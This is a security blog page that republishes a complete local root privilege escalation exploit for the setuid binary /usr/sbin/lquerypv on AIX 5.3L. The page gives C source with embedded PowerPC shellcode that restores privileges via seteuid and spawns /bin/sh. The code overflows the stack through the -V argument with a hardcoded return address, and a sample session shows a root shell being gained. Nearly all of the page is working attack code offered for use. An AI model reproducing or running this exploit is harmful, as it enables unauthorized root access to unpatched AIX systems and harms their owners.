Saturday, November 23, 2024

AIX 5.3L /usr/sbin/lquerypv local root privilege escalation

[Security Risk Critical] [local exploits] [AIX] [verified]

AIX 5.3L /usr/sbin/lquerypv Local Root Privilege Escalation Exploit

AIX5.3L includes a setuid root binary "lquerypv" which contains a stack-based* overflow in the handling of -V command line argument. However, prior to the * vulnerability being triggered the binary drops privileges. On AIX you can * restore the dropped privileges using seteuid() which results in a local root* LPE vulnerability.

/*AIX 5.3L /usr/sbin/lquerypv local root privilege escalation 
* ===========================================================
* AIX5.3L includes a setuid root binary "lquerypv" which contains a stack-based
* overflow in the handling of -V command line argument. However, prior to the 
* vulnerability being triggered the binary drops privileges. On AIX you can 
* restore the dropped privileges using seteuid() which results in a local root
* LPE vulnerability.
* 
* e.g
* bash-4.4$ ls -al `which lquerypv`;id;uname -a;oslevel
* -r-sr-xr-x   1 root     system        27160 Apr 28 2006  /usr/sbin/lquerypv
* uid=202(user) gid=1(staff)
* AIX aix53l 3 5 000772244C00
* 5.3.0.0
* bash-4.4$ ./aix53l-lquerypv
* [ AIX 5.3L /usr/sbin/lquerypv local root privilege escalation exploit
* # id
* uid=202(user) gid=1(staff) euid=0(root)
*
* -- Hacker Fantastic 
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
#include <unistd.h>
 
char shellcode[]="\x7f\xff\xfb\x78" /* mr      r31,r31 (nop)          */
                 "\x7c\x84\x22\x78" /* xor     r4,r4,r4         */
                 "\x7e\x94\xa2\x79" /* xor.    r20,r20,r20            */
                 "\x40\x82\xff\xfd" /* bnel    (setreuidcode)         */
                 "\x7e\xa8\x02\xa6" /* mflr    r21                    */
                 "\x3a\xb5\x01\x40" /* cal     r21,0x140(r21)         */
                 "\x88\x55\xfe\xe0" /* lbz     r2,-288(r21)           */
                 "\x7e\x83\xa3\x78" /* mr      r3,r20                 */
                 "\x3a\xd5\xfe\xe4" /* cal     r22,-284(r21)          */
                 "\x7e\xc8\x03\xa6" /* mtlr    r22                    */
                 "\x4c\xc6\x33\x42" /* crorc   cr6,cr6,cr6            */
                 "\x44\xff\xff\x02" /* svca                           */
                 "\xaa\x06\xff\xff" /* 0xaa = seteuid 0x06 = execve   */
                 "\x38\x75\xff\x04" /* cal     r3,-252(r21)           */
                 "\x38\x95\xff\x0c" /* cal     r4,-244(r21)           */
                 "\x7e\x85\xa3\x78" /* mr      r5,r20                 */
                 "\x90\x75\xff\x0c" /* st      r3,-244(r21)           */
                 "\x92\x95\xff\x10" /* st      r20,-240(r21)          */
                 "\x88\x55\xfe\xe1" /* lbz     r2,-287(r21)           */
                 "\x9a\x95\xff\x0b" /* stb     r20,-245(r21)          */
                 "\x4b\xff\xff\xd8" /* bl      (setreuidcode+32)      */
                 "/bin/sh";
 
int main(int argc,char* argv[]){
        char *env[] = {NULL};
        char *buffer = malloc(2048);
        long ptr;
        char *argp[] = {"lquerypv","-V",buffer,NULL};
        setreuid(0,0);
        if(!buffer){
                printf("[ malloc() failure\n");
                exit(-1);
        }
        printf("[ AIX 5.3L /usr/sbin/lquerypv local root privilege escalation exploit\n");
        memset(buffer,0,2048);
        memset(buffer,'\x90',1044);
        ptr = (long)buffer + 1043;
        memcpy((void*)ptr,"\x2f\xf2\x2b\x54",4); //0x2ff22b54
        memcpy(buffer,(void*)&shellcode,strlen((char*)&shellcode));
        execve("/usr/sbin/lquerypv",argp,env);
}
 
Bookmark
Please login to bookmarkClose
Recommended:  High-Severity RCE Security Bug Reported in Apache Cassandra Database Software
Share the word, let's increase Cybersecurity Awareness as we know it
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

RiSec.Mitch
Just your average information security researcher from Delaware US.

more infosec reads

Subscribe for weekly updates

explore

more

security